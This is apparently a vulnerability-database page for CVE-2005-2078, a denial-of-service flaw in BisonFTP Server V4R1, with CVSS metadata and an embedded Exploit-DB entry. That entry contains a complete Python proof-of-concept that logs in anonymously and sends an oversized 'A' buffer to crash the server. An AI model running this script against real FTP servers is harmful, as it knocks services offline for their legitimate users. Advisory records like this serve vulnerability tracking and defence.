Search...

CVE-2005-2078

2005-06-29T04:00:00

ID CVE-2005-2078
Type cve
Reporter cve@mitre.org
Modified 2008-09-05T20:50:00

Description

BisonFTP Server V4R1 allows remote authenticated users to cause a denial of service via an invalid command with a long argument.

JSON Vulners Source

Initial Source

{"id": "CVE-2005-2078", "bulletinFamily": "NVD", "title": "CVE-2005-2078", "description": "BisonFTP Server V4R1 allows remote authenticated users to cause a denial of service via an invalid command with a long argument.", "published": "2005-06-29T04:00:00", "modified": "2008-09-05T20:50:00", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2078", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/14079"], "cvelist": ["CVE-2005-2078"], "type": "cve", "lastseen": "2019-05-29T18:08:14", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "0bec297eddd0677a95558d98bec47718"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "ce48f2f1c0a7be62281ba4f9e321fd94"}, {"key": "cpe23", "hash": "e6c6f5569a89b1cd85aaae7490dc68bc"}, {"key": "cvelist", "hash": "2b1496e4c0986f0602f31b3eb684ecff"}, {"key": "cvss", "hash": "ce941f93413173b325a8f1e1d8106bcf"}, {"key": "cvss2", "hash": "c19f13d86817989e6c1652833903ab7b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "a510a2bd1b154dc4c8cf18a657c710ab"}, {"key": "href", "hash": "3c66aa931cdab4c5db113f28c1162463"}, {"key": "modified", "hash": "39a247021374d76402dba2acf982bf86"}, {"key": "published", "hash": "51a08567c32526d21e91ec233d8673ff"}, {"key": "references", "hash": "87142881e7e215336cda53fdb4533aa9"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "70b14b5144506b4f5eaa24aeb531325d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b7e89261ceb3aa3b33aeb816c24d1f664664e50d27493903a693bfc359fb4207", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:25911"]}, {"type": "osvdb", "idList": ["OSVDB:17730"]}], "modified": "2019-05-29T18:08:14"}, "score": {"value": 5.5, "vector": "NONE", "modified": "2019-05-29T18:08:14"}, "vulnersScore": 5.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:sofotex:bisonftp:v4r1"], "affectedSoftware": [{"name": "sofotex bisonftp", "operator": "eq", "version": "v4r1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:sofotex:bisonftp:v4r1:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-02-03T02:26:21", "bulletinFamily": "exploit", "description": "BisonFTP V4R1 Remote Denial Of Service Vulnerability. CVE-2005-2078. Dos exploit for windows platform", "modified": "2005-06-28T00:00:00", "published": "2005-06-28T00:00:00", "id": "EDB-ID:25911", "href": "https://www.exploit-db.com/exploits/25911/", "type": "exploitdb", "title": "BisonFTP 4R1 - Remote Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/14079/info\r\n\r\nBisonFTP is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users.\r\n\r\nReports indicate that the issue may be exploited only after successful authentication. \r\n\r\n#!/usr/bin/python\r\n#\r\n# Vulnerability: Denial Of Service\r\n# Discovered on: June 26, 2005 by fRoGGz - SecuBox Labs\r\n# When an invalid buffer size is sent to BisonFTPD -> DoS (100% CPU usage or crash)\r\n# NB: Sorry for Python purists, it's the first time that i use it ;)\r\n\r\nimport socket\r\nimport time\r\n\r\nn = 1\r\nt = 98192 #Try others, it's funny.\r\np = 21 # Set your port here.\r\nip = \"192.168.0.1\" # Set ip here.\r\nboom = \"PoC \"+'\\x41'*t\r\n\r\nprint \"\\n\\nVulnerable product: BisonFTP Server V4R1\"\r\nprint \"Denial of Service vulnerability\"\r\nprint \"---------------------------------------------\"\r\nprint \"Discovered & coded by fRoGGz - SecuBox Labs\\n\"\r\n\r\ntry:\r\n\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n connect=s.connect((ip,p))\r\n\r\n d=s.recv(1024)\r\n\r\n print \"[+] \" +d\r\n\r\n print \"[+] Utilisateur.\"\r\n\r\n time.sleep(1)\r\n\r\n s.send('USER Anonymous\\r\\n')\r\n\r\n s.recv(512)\r\n\r\n print \"[+] Mot de passe.\"\r\n\r\n time.sleep(1)\r\n\r\n s.send('PASS Anonymous\\r\\n')\r\n\r\n s.recv(512)\r\n\r\n print \"[+] Envoi malicieux.\\n\\nDoS termine !\\n\"\r\n\r\n time.sleep(1)\r\n\r\n s.send(boom+'r\\n\\n')\r\n\r\n\r\nexcept:\r\n\r\n print \"[+] Machine indisponible, verifiez le port ou l'ip.\"\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25911/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.sofotex.com/BisonFTP-Server-download_L1880.html\n[CVE-2005-2078](https://vulners.com/cve/CVE-2005-2078)\nBugtraq ID: 14079\n", "modified": "2005-06-29T00:00:00", "published": "2005-06-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:17730", "id": "OSVDB:17730", "title": "SofoTex BisonFTP Command Line Overflow", "type": "osvdb", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}